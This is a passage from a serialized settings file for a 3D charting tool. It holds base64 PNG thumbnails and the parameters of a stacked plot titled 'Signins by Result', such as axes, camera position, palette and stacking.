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', 'Title': 'Signins by Result', 'TitleSize': 1, 'TransitionIndex': 0}, {'$type': 'HoloGraphBridge.Plots.LinearStackPlot, HoloGraphBridge', 'AxesDivisions': [35, 7, 42], 'AxesDivisionsAuto': [False, False, False], 'AxesEdgesShow': [True, True, True], 'AxesGridlinesShow': [True, True, True], 'AxesLabelsOrientation': [1, 1, 1], 'AxesLabelsShow': [True, True, True], 'AxesLabelsSize': [0.25, 0.39, 0.42], 'AxesTicksShow': [False, False, False], 'AxesTitleSize': [0.5, 0.5, 0.5], 'PositionFill': [False, False, False], 'PositionIndex': [18, -1, 32], 'PositionRescale': [False, False, False], 'PositionReverse': [False, False, False], 'PositionScale': [1, 7.9, 1], 'StackBuckets': [34, 0, 3], 'StackBucketsAuto': [True, True, True], 'StackBucketsFill': [False, False, False], 'StackGroup': False, 'StackOrderAuto': True, 'StackOrderIndex': 42, 'StackOrderReverse': False, 'StackRescale': False, 'StackSpacing': [2, 1, 0], 'StackSpacingAuto': [False, False, False], 'StackSumIndex': -1, 'StackWidth': [8, 1, 50], 'StackWidthAuto': [False, False, True], 'CameraRotation': [0, 0, 0, 1], 'CameraTranslation': [0, 0, 0], 'ColorFill': False, 'ColorIndex': 42, 'Filter': -1, 'LabelColumns': [{'Index': 26, 'Name': False, 'Units': False}, {'Index': 35, 'Name': False, 'Units': False}], 'Layers': [], 'ManipulationRotation': [True, True, True], 'ManipulationScale': True, 'ManipulationTranslation': [True, True, True], 'ModelRotation': [-0.4056781828403473, -0.412322461605072, -0.2986052334308624, 0.7591114044189453], 'ModelScale': 4, 'ModelTranslation': [-0.9530211091041565, 1.092308521270752, -0.7382761240005493], 'OrderIndex': 0, 'PaletteColors': [242, 27, 63, 255, 41, 191, 18, 255], 'PaletteDivisions': 2, 'PaletteDivisionsAuto': True, 'PaletteReverse': False, 'Selection': -1, 'Table': 0, 'TextSize': 0.5, 'TextWidth': 5, 'Thumbnail': 'data:image/png;base64,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